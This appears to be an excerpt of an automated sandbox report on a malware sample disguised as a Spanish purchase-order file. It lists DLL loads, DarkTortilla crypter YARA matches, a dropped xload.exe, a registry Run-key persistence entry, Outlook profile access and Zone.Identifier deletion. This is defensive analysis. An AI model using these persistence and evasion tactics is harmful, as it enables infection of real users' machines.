Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: acgenral.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 21.2.xload.exe.39924b2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.xload.exe.3aa03a2.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xload.exe.3bb03a2.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xload.exe.3aa24b2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.4dd0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.4dd0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1532858501.0000000002720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2317328552.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2326278811.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2326278811.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2518447949.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2518447949.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2518447949.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2326278811.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2317328552.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1541699498.0000000004DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2502322586.000000000298C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1532858501.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2502322586.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xload.exe PID: 5652, type: MEMORYSTR

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_06B3DAC5 push FFFFFF8Bh; iretd	0_2_06B3DAC7
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_06B3B020 push es; ret	0_2_06B3B05A
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_078F0040 push eax; ret	0_2_078F0839
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_078F178A push eax; retf	0_2_078F1791
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DF0040 push eax; ret	17_2_05DF0839
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DF178A push eax; retf	17_2_05DF1791
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706D660 pushad ; ret	17_2_0706DBC3
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706BB06 pushad ; ret	17_2_0706BB43
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706332E push FFFFFFE9h; retn 0001h	17_2_07063338
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706DB5D pushad ; ret	17_2_0706DBC3
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706BB70 push ecx; ret	17_2_0706BB82
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706342D push FFFFFFE9h; ret	17_2_07063437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CA9C30 push esp; retf 0286h	20_2_00CA9D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06219241 push es; ret	20_2_06219244
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_07880040 push eax; ret	21_2_07880839
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078ED660 pushad ; ret	21_2_078EDBC3
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078EBB06 pushad ; ret	21_2_078EBB43
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 21_2_078E332E push FFFFFFE9h; retn 0001h	21_2_078E3338

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Static PE information: section name: .text entropy: 6.980086524618487
Source: xload.exe.9.dr	Static PE information: section name: .text entropy: 6.980086524618487

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	File created: \consulta#9978-po24 orden de compra de materiales de muestra_sk.exe
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	File created: \consulta#9978-po24 orden de compra de materiales de muestra_sk.exe
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	File created: \consulta#9978-po24 orden de compra de materiales de muestra_sk.exe	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	File created: \consulta#9978-po24 orden de compra de materiales de muestra_sk.exe	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\xload.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xload			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xload			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	File opened: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	File opened: C:\Users\user\AppData\Roaming\xload.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	File opened: C:\Users\user\AppData\Roaming\xload.exe\:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
